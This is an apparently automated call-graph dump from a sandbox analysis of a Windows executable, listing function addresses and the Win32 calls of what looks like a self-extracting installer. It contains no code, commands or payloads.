1952b6 2450->2476 2452 192fab LoadLibraryA 2451->2452 2453 192fc0 GetProcAddress 2452->2453 2454 192ff7 FreeLibrary 2452->2454 2453->2454 2457 192fd6 DecryptFileA 2453->2457 2455 193017 SetCurrentDirectoryA 2454->2455 2456 193006 2454->2456 2458 193054 2455->2458 2459 193026 2455->2459 2456->2455 2726 19621e GetWindowsDirectoryA 2456->2726 2457->2454 2464 192ff0 2457->2464 2460 193061 2458->2460 2737 193b26 2458->2737 2462 1944b9 20 API calls 2459->2462 2460->2444 2466 19307a 2460->2466 2746 19256d 2460->2746 2468 193037 2462->2468 2464->2454 2472 193098 2466->2472 2757 193ba2 2466->2757 2813 196285 GetLastError 2468->2813 2472->2444 2473 1930af 2472->2473 2815 194169 2473->2815 2478 1952d6 2476->2478 2486 195316 2476->2486 2477 195300 LocalFree LocalFree 2477->2478 2477->2486 2478->2477 2481 1952eb SetFileAttributesA DeleteFileA 2478->2481 2479 19538c 2482 196ce0 4 API calls 2479->2482 2480 195374 2480->2479 3124 191fe1 2480->3124 2481->2477 2484 192c72 2482->2484 2484->2384 2484->2392 2485 19535e SetCurrentDirectoryA 2487 192390 13 API calls 2485->2487 2486->2480 2486->2485 2488 1965e8 4 API calls 2486->2488 2487->2480 2488->2485 2490 191f9a 2489->2490 2491 191f9f 2489->2491 2492 191ea7 15 API calls 2490->2492 2493 191fc0 2491->2493 2494 1944b9 20 API calls 2491->2494 2497 191fd9 2491->2497 2492->2491 2495 191ee2 GetCurrentProcess OpenProcessToken 2493->2495 2496 191fcf ExitWindowsEx 2493->2496 2493->2497 2494->2493 2499 191f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2495->2499 2502 191f0e 2495->2502 2496->2497 2497->2384 2500 191f6b ExitWindowsEx 2499->2500 2499->2502 2501 191f1f 2500->2501 2500->2502 2504 196ce0 4 API calls 2501->2504 2503 1944b9 20 API calls 2502->2503 2503->2501 2505 191f8c 2504->2505 2505->2384 2507 192d1a 2506->2507 2508 1946b6 2506->2508 2507->2397 2507->2398 2508->2507 2509 1946be FindResourceA LoadResource LockResource 2508->2509 2509->2507 2510 1946df memcpy_s FreeResource 2509->2510 2510->2507 2518 195e17 2511->2518 2535 195cc3 2511->2535 2512 195dd0 2516 195dec GetModuleFileNameA 2512->2516 2512->2518 2513 196ce0 4 API calls 2515 192e2c 2513->2515 2514 195ced CharNextA 2514->2535 2515->2397 2515->2414 2517 195e0a 2516->2517 2516->2518 2587 1966c8 2517->2587 2518->2513 2520 196218 2596 196e2a 2520->2596 2523 195e36 CharUpperA 2524 1961d0 2523->2524 2523->2535 2525 1944b9 20 API calls 2524->2525 2526 1961e7 2525->2526 2527 1961f0 CloseHandle 2526->2527 2528 1961f7 ExitProcess 2526->2528 2527->2528 2529 195f9f CharUpperA 2529->2535 2530 195f59 CompareStringA 2530->2535 2531 196003 CharUpperA 2531->2535 2532 195edc CharUpperA 2532->2535 2533 1960a2 CharUpperA 2533->2535 2534 19667f IsDBCSLeadByte CharNextA 2534->2535 2535->2512 2535->2514 2535->2518 2535->2520 2535->2523 2535->2529 2535->2530 2535->2531 2535->2532 2535->2533 2535->2534 2592 19658a 2535->2592 2538 1924cb 2537->2538 2541 1923b9 2537->2541 2539 196ce0 4 API calls 2538->2539 2540 1924dc 2539->2540 2540->2408 2541->2538 2542 1923e9 FindFirstFileA 2541->2542 2542->2538 2543 192407 2542->2543 2544 192479 2543->2544 2545 192421 lstrcmpA 2543->2545 2546 1924a9 FindNextFileA 2543->2546 2550 19658a CharPrevA 2543->2550 2551 192390 5 API calls 2543->2551 2548 192488 SetFileAttributesA DeleteFileA 2544->2548 2545->2546 2547 192431 lstrcmpA 2545->2547 2546->2543 2549 1924bd FindClose RemoveDirectoryA 2546->2549 2547->2543 2547->2546 2548->2546 2549->2538 2550->2543 2551->2543 2556 193737 2552->2556 2559 19372d 2552->2559 2553 1944b9 20 API calls 2566 1939fc 2553->2566 2554 196ce0 4 API calls 2555 192e92 2554->2555 2555->2402 2555->2408 2567 1918a3 2555->2567 2558 1938a4 2556->2558 2556->2559 2556->2566 2603 1928e8 2556->2603 2558->2559 2560 1939c1 MessageBeep 2558->2560 2558->2566 2559->2553 2559->2566 2561 19681f 10 API calls 2560->2561 2562 1939ce 2561->2562 2563 1939d8 MessageBoxA 2562->2563 2564 1967c9 EnumResourceLanguagesA 2562->2564 2563->2566 2564->2563 2566->2554 2568 1919b8 2567->2568 2569 1918d5 2567->2569 2570 196ce0 4 API calls 2568->2570 2632 1917ee LoadLibraryA 2569->2632 2573 1919d5 2570->2573 2573->2408 2573->2434 2574 1918e5 GetCurrentProcess OpenProcessToken 2574->2568 2575 191900 GetTokenInformation 2574->2575 2576 191918 GetLastError 2575->2576 2577 1919aa CloseHandle 2575->2577 2576->2577 2578 191927 LocalAlloc 2576->2578 2577->2568 2579 1919a9 2578->2579 2580 191938 GetTokenInformation 2578->2580 2579->2577 2581 19194e AllocateAndInitializeSid 2580->2581 2582 1919a2 LocalFree 2580->2582 2581->2582 2586 19196e 2581->2586 2582->2579 2583 191999 FreeSid 2583->2582 2584 191975 EqualSid 2585 19198c 2584->2585 2584->2586 2585->2583 2586->2583 2586->2584 2586->2585 2589 1966d5 2587->2589 2588 1966f3 2588->2518 2589->2588 2591 1966e5 CharNextA 2589->2591 2599 196648 2589->2599 2591->2589 2593 19659b 2592->2593 2593->2593 2594 1965ab 2593->2594 2595 1965b8 CharPrevA 2593->2595 2594->2535 2595->2594 2602 196cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 19621d 2600 19665d IsDBCSLeadByte 2599->2600 2601 196668 2599->2601 2600->2601 2601->2589 2602->2598 2604 192a62 2603->2604 2611 19290d 2603->2611 2605 192a6e GlobalFree 2604->2605 2606 192a75 2604->2606 2605->2606 2606->2558 2608 192955 GlobalAlloc 2608->2604 2609 192968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 192a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 192a80 GlobalUnlock 2611->2612 2613 192773 2611->2613 2612->2604 2614 1927a3 CharUpperA CharNextA CharNextA 2613->2614 2615 1928b2 2613->2615 2616 1927db 2614->2616 2617 1928b7 GetSystemDirectoryA 2614->2617 2615->2617 2619 1928a8 GetWindowsDirectoryA 2616->2619 2620 1927e3 2616->2620 2618 1928bf 2617->2618 2621 1928d2 2618->2621 2622 19658a CharPrevA 2618->2622 2619->2618 2624 19658a CharPrevA 2620->2624 2623 196ce0 4 API calls 2621->2623 2622->2621 2625 1928e2 2623->2625 2626 192810 RegOpenKeyExA 2624->2626 2625->2611 2626->2618 2627 192837 RegQueryValueExA 2626->2627 2628 19289a RegCloseKey 2627->2628 2629 19285c 2627->2629 2628->2618 2630 192867 ExpandEnvironmentStringsA 2629->2630 2631 19287a 2629->2631 2630->2631 2631->2628 2633 191890 2632->2633 2634 191826 GetProcAddress 2632->2634 2635 196ce0 4 API calls 2633->2635 2636 191889 FreeLibrary 2634->2636 2637 191839 AllocateAndInitializeSid 2634->2637 2638 19189f 2635->2638 2636->2633 2637->2636 2639 19185f FreeSid 2637->2639 2638->2568 2638->2574 2639->2636 2642 19468f 7 API calls 2641->2642 2643 1951f9 LocalAlloc 2642->2643 2644 19522d 2643->2644 2645 19520d 2643->2645 2647 19468f 7 API calls 2644->2647 2646 1944b9 20 API calls 2645->2646 2648 19521e 2646->2648 2649 19523a 2647->2649 2650 196285 GetLastError 2648->2650 2651 19523e 2649->2651 2652 195262 lstrcmpA 2649->2652 2660 195223 2650->2660 2655 1944b9 20 API calls 2651->2655 2653 19527e 2652->2653 2654 195272 LocalFree 2652->2654 2656 1944b9 20 API calls 2653->2656 2658 192f4d 2654->2658 2657 19524f LocalFree 2655->2657 2659 195290 LocalFree 2656->2659 2657->2658 2658->2436 2658->2439 2658->2444 2659->2660 2660->2658 2662 19468f 7 API calls 2661->2662 2663 195175 2662->2663 2664 19517a 2663->2664 2665 1951af 2663->2665 2667 1944b9 20 API calls 2664->2667 2666 19468f 7 API calls 2665->2666 2668 1951c0 2666->2668 2675 19518d 2667->2675 2828 196298 2668->2828 2672 1951ce 2674 1944b9 20 API calls 2672->2674 2673 1951e1 2673->2441 2674->2675 2675->2441 2677 19468f 7 API calls 2676->2677 2678 1955c7 LocalAlloc 2677->2678 2679 1955db 2678->2679 2680 1955fd 2678->2680 2681 1944b9 20 API calls 2679->2681 2682 19468f 7 API calls 2680->2682 2683 1955ec 2681->2683 2684 19560a 2682->2684 2685 196285 GetLastError 2683->2685 2686 19560e 2684->2686 2687 195632 lstrcmpA 2684->2687 2688 1955f1 2685->2688 2689 1944b9 20 API calls 2686->2689 2690 19564b LocalFree 2687->2690 2691 195645 2687->2691 2714 1955f6 2688->2714 2694 19561f LocalFree 2689->2694 2692 19565b 2690->2692 2693 195696 2690->2693 2691->2690 2699 195467 49 API calls 2692->2699 2695 19589f 2693->2695 2698 1956ae GetTempPathA 2693->2698 2694->2714 2696 196517 24 API calls 2695->2696 2696->2714 2697 196ce0 4 API calls 2700 192f7e 2697->2700 2701 1956c3 2698->2701 2705 1956eb 2698->2705 2702 195678 2699->2702 2700->2444 2700->2449 2840 195467 2701->2840 2704 195680 2702->2704 2702->2714 2707 1944b9 20 API calls 2704->2707 2708 19586c GetWindowsDirectoryA 2705->2708 2709 195717 GetDriveTypeA 2705->2709 2705->2714 2707->2688 2874 19597d GetCurrentDirectoryA SetCurrentDirectoryA 2708->2874 2712 195730 GetFileAttributesA 2709->2712 2724 19572b 2709->2724 2712->2724 2714->2697 2715 195467 49 API calls 2715->2705 2717 192630 21 API calls 2717->2724 2718 1957c1 GetWindowsDirectoryA 2718->2724 2719 19658a CharPrevA 2721 1957e8 GetFileAttributesA 2719->2721 2720 19597d 34 API calls 2720->2724 2722 1957fa CreateDirectoryA 2721->2722 2721->2724 2722->2724 2723 195827 SetFileAttributesA 2723->2724 2724->2708 2724->2709 2724->2712 2724->2714 2724->2717 2724->2718 2724->2719 2724->2720 2724->2723 2725 195467 49 API calls 2724->2725 2870 196952 2724->2870 2725->2724 2727 196249 2726->2727 2728 196268 2726->2728 2729 1944b9 20 API calls 2727->2729 2730 19597d 34 API calls 2728->2730 2731 19625a 2729->2731 2732 196277 2730->2732 2733 196285 GetLastError 2731->2733 2734 196ce0 4 API calls 2732->2734 2735 19625f 2733->2735 2736 193013 2734->2736 2735->2732 2736->2444 2736->2455 2738 193b2d 2737->2738 2738->2738 2739 193b72 2738->2739 2740 193b53 2738->2740 2941 194fe0 2739->2941 2742 196517 24 API calls 2740->2742 2743 193b70 2742->2743 2744 196298 10 API calls 2743->2744 2745 193b7b 2743->2745 2744->2745 2745->2460 2747 192583 2746->2747 2748 192622 2746->2748 2750 1925e8 RegOpenKeyExA 2747->2750 2751 19258b 2747->2751 2971 1924e0 GetWindowsDirectoryA 2748->2971 2752 1925e3 2750->2752 2753 192609 RegQueryInfoKeyA 2750->2753 2751->2752 2755 19259b RegOpenKeyExA 2751->2755 2752->2466 2754 1925d1 RegCloseKey 2753->2754 2754->2752 2755->2752 2756 1925bc RegQueryValueExA 2755->2756 2756->2754 2758 193bdb 2757->2758 2771 193bec 2757->2771 2759 19468f 7 API calls 2758->2759 2759->2771 2760 193c03 memset 2760->2771 2761 193d13 2762 1944b9 20 API calls 2761->2762 2790 193d26 2762->2790 2764 193f4d 2766 196ce0 4 API calls 2764->2766 2765 19468f 7 API calls 2765->2771 2768 193f60 2766->2768 2767 193d7b CompareStringA 2767->2771 2779 193fd7 2767->2779 2768->2472 2770 193fab 2773 1944b9 20 API calls 2770->2773 2771->2760 2771->2761 2771->2764 2771->2765 2771->2767 2771->2770 2774 193f1e LocalFree 2771->2774 2775 193f46 LocalFree 2771->2775 2771->2779 2780 193cc7 CompareStringA 2771->2780 2791 193e10 2771->2791 2979 191ae8 2771->2979 3019 19202a memset memset RegCreateKeyExA 2771->3019 3045 193fef 2771->3045 2777 193fbe LocalFree 2773->2777 2774->2771 2774->2779 2775->2764 2777->2764 2779->2764 3069 192267 2779->3069 2780->2771 2781 193e1f GetProcAddress 2783 193f64 2781->2783 2781->2791 2782 193f92 2784 1944b9 20 API calls 2782->2784 2785 1944b9 20 API calls 2783->2785 2786 193fa9 2784->2786 2787 193f75 FreeLibrary 2785->2787 2788 193f7c LocalFree 2786->2788 2787->2788 2789 196285 GetLastError 2788->2789 2789->2790 2790->2764 2791->2781 2791->2782 2792 193eff FreeLibrary 2791->2792 2793 193f40 FreeLibrary 2791->2793 3059 196495 2791->3059 2792->2774 2793->2775 2795 19468f 7 API calls 2794->2795 2796 193a55 LocalAlloc 2795->2796 2797 193a6c 2796->2797 2798 193a8e 2796->2798 2799 1944b9 20 API calls 2797->2799 2800 19468f 7 API calls 2798->2800 2801 193a7d 2799->2801 2802 193a98 2800->2802 2803 196285 GetLastError 2801->2803 2804 193a9c 2802->2804 2805 193ac5 lstrcmpA 2802->2805 2806 192f64 2803->2806 2807 1944b9 20 API calls 2804->2807 2808 193ada 2805->2808 2809 193b0d LocalFree 2805->2809 2806->2436 2806->2444 2811 193aad LocalFree 2807->2811 2810 196517 24 API calls 2808->2810 2809->2806 2812 193aec LocalFree 2810->2812 2811->2806 2812->2806 2814 19303c 2813->2814 2814->2444 2816 19468f 7 API calls 2815->2816 2817 19417d LocalAlloc 2816->2817 2818 1941a8 2817->2818 2819 194195 2817->2819 2821 19468f 7 API calls 2818->2821 2820 1944b9 20 API calls 2819->2820 2822 1941a6 2820->2822 2823 1941b5 2821->2823 2822->2444 2824 1941b9 2823->2824 2825 1941c5 lstrcmpA 2823->2825 2827 1944b9 20 API calls 2824->2827 2825->2824 2826 1941e6 LocalFree 2825->2826 2826->2822 2827->2826 2829 19171e _vsnprintf 2828->2829 2830 1962c9 FindResourceA 2829->2830 2832 1962cb LoadResource LockResource 2830->2832 2833 196353 2830->2833 2832->2833 2836 1962e0 2832->2836 2834 196ce0 4 API calls 2833->2834 2835 1951ca 2834->2835 2835->2672 2835->2673 2837 19631b FreeResource 2836->2837 2838 196355 FreeResource 2836->2838 2839 19171e _vsnprintf 2837->2839 2838->2833 2839->2830 2841 19548a 2840->2841 2859 19551a 2840->2859 2901 1953a1 2841->2901 2844 195581 2847 196ce0 4 API calls 2844->2847 2846 195495 2846->2844 2850 19550c 2846->2850 2851 1954c2 GetSystemInfo 2846->2851 2852 19559a 2847->2852 2848 19553b CreateDirectoryA 2853 195577 2848->2853 2854 195547 2848->2854 2849 19554d 2849->2844 2855 19597d 34 API calls 2849->2855 2856 19658a CharPrevA 2850->2856 2862 1954da 2851->2862 2852->2714 2864 192630 GetWindowsDirectoryA 2852->2864 2857 196285 GetLastError 2853->2857 2854->2849 2858 19555c 2855->2858 2856->2859 2860 19557c 2857->2860 2858->2844 2863 195568 RemoveDirectoryA 2858->2863 2912 1958c8 2859->2912 2860->2844 2861 19658a CharPrevA 2861->2850 2862->2850 2862->2861 2863->2844 2865 19266f 2864->2865 2866 19265e 2864->2866 2868 196ce0 4 API calls 2865->2868 2867 1944b9 20 API calls 2866->2867 2867->2865 2869 192687 2868->2869 2869->2705 2869->2715 2871 19696e GetDiskFreeSpaceA 2870->2871 2872 1969a1 2870->2872 2871->2872 2873 196989 MulDiv 2871->2873 2872->2724 2873->2872 2875 1959bb 2874->2875 2876 1959dd GetDiskFreeSpaceA 2874->2876 2877 1944b9 20 API calls 2875->2877 2878 195ba1 memset 2876->2878 2879 195a21 MulDiv 2876->2879 2880 1959cc 2877->2880 2881 196285 GetLastError 2878->2881 2879->2878 2882 195a50 GetVolumeInformationA 2879->2882 2883 196285 GetLastError 2880->2883 2884 195bbc GetLastError FormatMessageA 2881->2884 2885 195a6e memset 2882->2885 2886 195ab5 SetCurrentDirectoryA 2882->2886 2887 1959d1 2883->2887 2888 195be3 2884->2888 2889 196285 GetLastError 2885->2889 2895 195acc 2886->2895 2899 195b94 2887->2899 2890 1944b9 20 API calls 2888->2890 2891 195a89 GetLastError FormatMessageA 2889->2891 2892 195bf5 SetCurrentDirectoryA 2890->2892 2891->2888 2892->2899 2893 196ce0 4 API calls 2894 195c11 2893->2894 2894->2705 2896 195b0a 2895->2896 2898 195b20 2895->2898 2897 1944b9 20 API calls 2896->2897 2897->2887 2898->2899 2924 19268b 2898->2924 2899->2893 2903 1953bf 2901->2903 2902 19171e _vsnprintf 2902->2903 2903->2902 2904 19658a CharPrevA 2903->2904 2907 195415 GetTempFileNameA 2903->2907 2905 1953fa RemoveDirectoryA GetFileAttributesA 2904->2905 2905->2903 2906 19544f CreateDirectoryA 2905->2906 2906->2907 2908 19543a 2906->2908 2907->2908 2909 195429 DeleteFileA CreateDirectoryA 2907->2909 2910 196ce0 4 API calls 2908->2910 2909->2908 2911 195449 2910->2911 2911->2846 2913 1958d8 2912->2913 2913->2913 2914 1958df LocalAlloc 2913->2914 2915 1958f3 2914->2915 2918 195919 2914->2918 2916 1944b9 20 API calls 2915->2916 2917 195906 2916->2917 2919 196285 GetLastError 2917->2919 2921 195534 2917->2921 2920 19658a CharPrevA 2918->2920 2919->2921 2922 195931 CreateFileA LocalFree 2920->2922 2921->2848 2921->2849 2922->2917 2923 19595b CloseHandle GetFileAttributesA 2922->2923 2923->2917 2925 1926b9 2924->2925 2926 1926e5 2924->2926 2927 19171e _vsnprintf 2925->2927 2928 1926ea 2926->2928 2929 19271f 2926->2929 2931 1926cc 2927->2931 2932 19171e _vsnprintf 2928->2932 2930 1926e3 2929->2930 2933 19171e _vsnprintf 2929->2933 2934 196ce0 4 API calls 2930->2934 2935 1944b9 20 API calls 2931->2935 2936 1926fd 2932->2936 2938 192735 2933->2938 2939 19276d 2934->2939 2935->2930 2937 1944b9 20 API calls 2936->2937 2937->2930 2940 1944b9 20 API calls 2938->2940 2939->2899 2940->2930 2942 19468f 7 API calls 2941->2942 2943 194ff5 FindResourceA LoadResource LockResource 2942->2943 2944 195020 2943->2944 2959 19515f 2943->2959 2945 195029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2944->2945 2946 195057 2944->2946 2945->2946 2963 194efd 2946->2963 2949 19507c 2953 1950e8 2949->2953 2957 195106 2949->2957 2950 195060 2951 1944b9 20 API calls 2950->2951 2952 195075 2951->2952 2952->2957 2954 1944b9 20 API calls 2953->2954 2954->2952 2955 195110 FreeResource 2956 19511d 2955->2956 2958 195129 2956->2958 2960 19513a 2956->2960 2957->2955 2957->2956 2961 1944b9 20 API calls 2958->2961 2959->2743 2960->2959 2962 19514c SendMessageA 2960->2962 2961->2960 2962->2959 2964 194f4a 2963->2964 2965 194fa1 2964->2965 2966 194980 25 API calls 2964->2966 2967 196ce0 4 API calls 2965->2967 2969 194f67 2966->2969 2968 194fc6 2967->2968 2968->2949 2968->2950 2969->2965 2970 194b60 FindCloseChangeNotification 2969->2970 2970->2965 2972 19255b 2971->2972 2973 192510 2971->2973 2975 196ce0 4 API calls 2972->2975 2974 19658a CharPrevA 2973->2974 2976 192522 WritePrivateProfileStringA _lopen 2974->2976 2977 192569 2975->2977 2976->2972 2978 192548 _llseek _lclose 2976->2978 2977->2752 2978->2972 2980 191b25 2979->2980 3083 191a84 2980->3083 2982 191b57 2983 19658a CharPrevA 2982->2983 2984 191b8c 2982->2984 2983->2984 2985 1966c8 2 API calls 2984->2985 2986 191bd1 2985->2986 2987 191bd9 CompareStringA 2986->2987 2988 191d73 2986->2988 2987->2988 2989 191bf7 GetFileAttributesA 2987->2989 2990 1966c8 2 API calls 2988->2990 2991 191c0d 2989->2991 2992 191d53 2989->2992 2993 191d7d 2990->2993 2991->2992 2998 191a84 2 API calls 2991->2998 2997 1944b9 20 API calls 2992->2997 2994 191df8 LocalAlloc 2993->2994 2995 191d81 CompareStringA 2993->2995 2994->2992 2996 191e0b GetFileAttributesA 2994->2996 2995->2994 3003 191d9b 2995->3003 3006 191e1d 2996->3006 3013 191e45 2996->3013 3018 191cc2 2997->3018 2999 191c31 2998->2999 3001 191c50 LocalAlloc 2999->3001 3007 191a84 2 API calls 2999->3007 3000 191e89 3002 196ce0 4 API calls 3000->3002 3001->2992 3004 191c67 GetPrivateProfileIntA GetPrivateProfileStringA 3001->3004 3005 191ea1 3002->3005 3003->3003 3008 191dbe LocalAlloc 3003->3008 3012 191cf8 3004->3012 3004->3018 3005->2771 3006->3013 3007->3001 3008->2992 3011 191de1 3008->3011 3016 19171e _vsnprintf 3011->3016 3014 191d09 GetShortPathNameA 3012->3014 3015 191d23 3012->3015 3089 192aac 3013->3089 3014->3015 3017 19171e _vsnprintf 3015->3017 3016->3018 3017->3018 3018->3000 3020 19209a 3019->3020 3021 192256 3019->3021 3023 19171e _vsnprintf 3020->3023 3026 1920dc 3020->3026 3022 196ce0 4 API calls 3021->3022 3024 192263 3022->3024 3025 1920af RegQueryValueExA 3023->3025 3024->2771 3025->3020 3025->3026 3027 1920fb GetSystemDirectoryA 3026->3027 3028 1920e4 RegCloseKey 3026->3028 3029 19658a CharPrevA 3027->3029 3028->3021 3030 19211b LoadLibraryA 3029->3030 3031 192179 GetModuleFileNameA 3030->3031 3032 19212e GetProcAddress FreeLibrary 3030->3032 3033 1921de RegCloseKey 3031->3033 3037 192177 3031->3037 3032->3031 3034 19214e GetSystemDirectoryA 3032->3034 3033->3021 3035 192165 3034->3035 3034->3037 3036 19658a CharPrevA 3035->3036 3036->3037 3037->3037 3038 1921b7 LocalAlloc 3037->3038 3039 1921cd 3038->3039 3040 1921ec 3038->3040 3041 1944b9 20 API calls 3039->3041 3042 19171e _vsnprintf 3040->3042 3041->3033 3043 192218 RegSetValueExA RegCloseKey LocalFree 3042->3043 3043->3021 3046 194016 CreateProcessA 3045->3046 3057 194106 3045->3057 3047 194041 WaitForSingleObject GetExitCodeProcess 3046->3047 3048 1940c4 3046->3048 3055 194070 3047->3055 3050 196285 GetLastError 3048->3050 3049 196ce0 4 API calls 3051 194117 3049->3051 3052 1940c9 GetLastError FormatMessageA 3050->3052 3051->2771 3054 1944b9 20 API calls 3052->3054 3054->3057 3116 19411b 3055->3116 3056 194096 CloseHandle CloseHandle 3056->3057 3058 1940ba 3056->3058 3057->3049 3058->3057 3060 1964c2 3059->3060 3061 19658a CharPrevA 3060->3061 3062 1964d8 GetFileAttributesA 3061->3062 3063 1964ea 3062->3063 3064 196501 LoadLibraryA 3062->3064 3063->3064 3065 1964ee LoadLibraryExA 3063->3065 3066 196508 3064->3066 3065->3066 3067 196ce0 4 API calls 3066->3067 3068 196513 3067->3068 3068->2791 3070 192289 RegOpenKeyExA 3069->3070 3071 192381 3069->3071 3070->3071 3073 1922b1 RegQueryValueExA 3070->3073 3072 196ce0 4 API calls 3071->3072 3074 19238c 3072->3074 3075 192374 RegCloseKey 3073->3075 3076 1922e6 memset GetSystemDirectoryA 3073->3076 3074->2764 3075->3071 3077 19230f 3076->3077 3078 192321 3076->3078 3079 19658a CharPrevA 3077->3079 3080 19171e _vsnprintf 3078->3080 3079->3078 3081 19233f RegSetValueExA 3080->3081 3081->3075 3085 191a9a 3083->3085 3086 191aba 3085->3086 3088 191aaf 3085->3088 3102 19667f 3085->3102 3086->2982 3087 19667f 2 API calls 3087->3088 3088->3086 3088->3087 3090 192be6 3089->3090 3091 192ad4 GetModuleFileNameA 3089->3091 3092 196ce0 4 API calls 3090->3092 3101 192b02 3091->3101 3094 192bf5 3092->3094 3093 192af1 IsDBCSLeadByte 3093->3101 3094->3000 3095 192bca CharNextA 3097 192bd3 CharNextA 3095->3097 3096 192b11 CharNextA CharUpperA 3098 192b8d CharUpperA 3096->3098 3096->3101 3097->3101 3098->3101 3100 192b43 CharPrevA 3100->3101 3101->3090 3101->3093 3101->3095 3101->3096 3101->3097 3101->3100 3107 1965e8 3101->3107 3103 196689 3102->3103 3104 1966a5 3103->3104 3105 196648 IsDBCSLeadByte 3103->3105 3106 196697 CharNextA 3103->3106 3104->3085 3105->3103 3106->3103 3108 1965f4 3107->3108 3108->3108 3109 1965fb CharPrevA 3108->3109 3110 196611 CharPrevA 3109->3110 3111 19660b 3110->3111 3112 19661e 3110->3112 3111->3110 3111->3112 3113 196634 CharNextA 3112->3113 3114 196627 CharPrevA 3112->3114 3115 19663d 3112->3115 3113->3115 3114->3113 3114->3115 3115->3101 3117 194132 3116->3117 3119 19412a 3116->3119 3120 191ea7 3117->3120 3119->3056 3121 191eba 3120->3121 3123 191ed3 3120->3123 3122 19256d 15 API calls 3121->3122 3122->3123 3123->3119 3125 191ff0 RegOpenKeyExA 3124->3125 3126 192026 3124->3126 3125->3126 3127 19200f RegDeleteValueA RegCloseKey 3125->3127 3126->2479 3127->3126 3276 196a20 __getmainargs 3277 1919e0 3278 191a03 3277->3278 3279 191a24 GetDesktopWindow 3277->3279 3280 191a20 3278->3280 3282 191a16 EndDialog 3278->3282 3281 1943d0 11 API calls 3279->3281 3284 196ce0 4 API calls 3280->3284 3283 191a33 LoadStringA SetDlgItemTextA MessageBeep 3281->3283 3282->3280 3283->3280 3285 191a7e 3284->3285

                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    • Opacity -> Relevance
                                                                                                                                                                                                                                    • Disassembly available
                                                                                                                                                                                                                                    callgraph 0 Function_0019411B 84 Function_00191EA7 0->84 1 Function_00192F1D 4 Function_0019621E 1->4 16 Function_00193A3F 1->16 25 Function_00193B26 1->25 40 Function_00194169 1->40 41 Function_0019256D 1->41 47 Function_00195164 1->47 59 Function_0019658A 1->59 66 Function_00196285 1->66 68 Function_001944B9 1->68 78 Function_001955A0 1->78 81 Function_00193BA2 1->81 115 Function_00196CE0 1->115 119 Function_001951E5 1->119 2 Function_0019681F 96 Function_001966F9 2->96 2->115 3 Function_0019171E 35 Function_0019597D 4->35 4->66 4->68 4->115 5 Function_00193210 24 Function_00194224 5->24 5->35 5->59 5->68 87 Function_001943D0 5->87 89 Function_001958C8 5->89 6 Function_00197010 7 Function_00195C17 8 Function_00196517 8->68 9 Function_00197208 10 Function_0019490C 11 Function_00197000 12 Function_00194200 13 Function_00193100 13->87 14 Function_00196C03 32 Function_0019724D 14->32 15 Function_00194702 63 Function_00191680 15->63 71 Function_001916B3 15->71 16->8 60 Function_0019468F 16->60 16->66 16->68 17 Function_00196C3F 18 Function_00192630 18->68 18->115 19 Function_00194C37 20 Function_00196E2A 100 Function_00196CF0 20->100 21 Function_0019202A 21->3 21->59 21->68 21->115 22 Function_00197120 23 Function_00196A20 24->63 24->68 25->8 51 Function_00196298 25->51 113 Function_00194FE0 25->113 26 Function_00194A50 27 Function_00193450 27->87 28 Function_00196952 29 Function_00197155 30 Function_00196F54 30->9 30->32 31 Function_00196648 33 Function_00196F40 34 Function_0019487A 34->10 58 Function_0019268B 35->58 35->66 35->68 35->115 36 Function_0019667F 36->31 37 Function_00197270 38 Function_00196C70 39 Function_00192773 39->59 61 Function_00191781 39->61 39->63 39->115 40->60 40->68 114 Function_001924E0 41->114 42 Function_0019476D 42->8 75 Function_001966AE 42->75 43 Function_00194B60 44 Function_00196A60 44->9 44->17 44->29 44->32 45 Function_00197060 44->45 97 Function_00192BFB 44->97 45->6 45->22 46 Function_00196760 47->51 47->60 47->68 48 Function_00195467 48->35 48->59 48->61 48->63 48->66 76 Function_001953A1 48->76 48->89 48->115 49 Function_00192267 49->3 49->59 49->115 50 Function_00194E99 50->63 51->3 51->115 52 Function_00195C9E 52->7 52->20 52->36 52->59 52->63 52->68 90 Function_001966C8 52->90 52->115 116 Function_001931E0 52->116 53 Function_00192390 53->53 53->59 53->63 53->71 53->115 54 Function_00191F90 54->68 54->84 54->115 55 Function_00196793 56 Function_00196495 56->59 56->61 56->115 57 Function_00192A89 58->3 58->68 58->115 59->71 62 Function_00194980 62->34 62->68 63->61 64 Function_00193680 65 Function_00196380 67 Function_00191A84 67->36 68->2 68->3 68->63 88 Function_001967C9 68->88 68->115 69 Function_00196FBE 69->30 70 Function_001969B0 70->11 70->38 70->69 108 Function_001971EF 70->108 71->61 72 Function_001952B6 72->53 72->61 105 Function_001965E8 72->105 112 Function_00191FE1 72->112 72->115 73 Function_00192CAA 73->8 73->52 73->53 73->60 73->68 80 Function_001918A3 73->80 110 Function_001936EE 73->110 73->115 74 Function_00192AAC 74->63 91 Function_001917C8 74->91 74->105 74->115 76->3 76->59 76->63 76->115 77 Function_00196FA1 78->8 78->18 78->28 78->35 78->48 78->59 78->60 78->61 78->66 78->68 78->115 79 Function_00194CA0 111 Function_001917EE 80->111 80->115 81->21 81->49 81->56 81->60 81->61 81->66 81->68 103 Function_00191AE8 81->103 107 Function_00193FEF 81->107 81->115 82 Function_001972A2 83 Function_00196FA5 83->32 84->41 85 Function_00194AD0 85->64 86 Function_00194CD0 86->15 86->19 86->42 86->43 86->50 86->62 86->115 117 Function_001947E0 86->117 87->115 88->55 89->59 89->63 89->66 89->68 90->31 92 Function_00194CC0 93 Function_00194BC0 94 Function_001930C0 95 Function_001963C0 95->59 95->61 95->115 97->1 97->54 97->72 97->73 98 Function_00194EFD 98->43 98->62 98->115 99 Function_001970FE 101 Function_001934F0 101->64 101->68 101->87 102 Function_00196EF0 103->3 103->59 103->61 103->63 103->67 103->68 103->71 103->74 103->90 103->115 104 Function_001928E8 104->39 104->57 106 Function_001970EB 107->0 107->66 107->68 107->115 109 Function_00196BEF 110->2 110->57 110->68 110->88 110->104 110->115 111->115 113->60 113->68 113->98 114->59 114->115 115->100 117->63 117->68 118 Function_001919E0 118->87 118->115 119->60 119->66 119->68

                                                                                                                                                                                                                                    Executed Functions

